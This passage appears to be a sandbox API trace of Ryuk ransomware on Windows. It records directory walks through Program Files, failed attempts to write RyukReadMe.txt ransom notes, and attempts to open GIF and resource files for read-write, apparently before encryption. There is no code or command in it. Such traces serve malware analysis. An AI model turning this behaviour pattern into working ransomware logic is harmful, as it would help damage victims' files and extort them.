dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.810] GetLastError () returned 0x5 [0133.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.810] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.811] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.811] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.811] SetLastError (dwErrCode=0x0) [0133.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.811] GetLastError () returned 0x5 [0133.811] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.811] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0133.812] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.812] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.812] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll", dwFileAttributes=0x80) returned 0 [0133.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.812] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.812] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.812] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll", dwFileAttributes=0x80) returned 0 [0133.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.813] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.813] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.813] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0133.813] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0133.813] SetLastError (dwErrCode=0x0) [0133.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.813] GetLastError () returned 0x5 [0133.813] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.813] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.813] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.813] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.813] SetLastError (dwErrCode=0x0) [0133.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.813] GetLastError () returned 0x5 [0133.813] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.813] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.813] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.814] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.814] SetLastError (dwErrCode=0x0) [0133.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.814] GetLastError () returned 0x5 [0133.814] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.814] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.814] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.814] SetLastError (dwErrCode=0x0) [0133.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.814] GetLastError () returned 0x5 [0133.814] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.814] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0133.814] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0133.814] SetLastError (dwErrCode=0x0) [0133.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.814] GetLastError () returned 0x5 [0133.814] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.814] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0133.814] SetLastError (dwErrCode=0x0) [0133.814] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.815] GetLastError () returned 0x5 [0133.815] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.815] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0133.815] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.815] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.815] SetLastError (dwErrCode=0x0) [0133.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.815] GetLastError () returned 0x5 [0133.815] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.815] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.816] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.816] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.816] SetLastError (dwErrCode=0x0) [0133.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.816] GetLastError () returned 0x5 [0133.816] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.816] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.818] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.818] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.818] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF", dwFileAttributes=0x80) returned 0 [0133.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.819] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.819] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.819] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF", dwFileAttributes=0x80) returned 0 [0133.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.819] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.820] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF", dwFileAttributes=0x80) returned 0 [0133.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.820] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.821] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.821] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF", dwFileAttributes=0x80) returned 0 [0133.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.821] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.821] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.821] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF", dwFileAttributes=0x80) returned 0 [0133.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.822] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.822] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.822] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.822] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF", dwFileAttributes=0x80) returned 0 [0133.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.823] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.823] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.823] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.823] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF", dwFileAttributes=0x80) returned 0 [0133.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.823] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.823] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.823] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.823] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF", dwFileAttributes=0x80) returned 0 [0133.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.824] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.824] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.824] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF", dwFileAttributes=0x80) returned 0 [0133.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.824] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.825] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.825] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF", dwFileAttributes=0x80) returned 0 [0133.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.825] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.825] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.825] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.825] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF", dwFileAttributes=0x80) returned 0 [0133.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.826] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.826] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.826] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF", dwFileAttributes=0x80) returned 0 [0133.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.827] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.827] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF", dwFileAttributes=0x80) returned 0 [0133.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.827] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.827] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF", dwFileAttributes=0x80) returned 0 [0133.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.828] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.828] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.828] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.828] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF", dwFileAttributes=0x80) returned 0 [0133.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.828] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.828] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.828] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.828] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF", dwFileAttributes=0x80) returned 0 [0133.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.829] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.829] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.829] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF", dwFileAttributes=0x80) returned 0 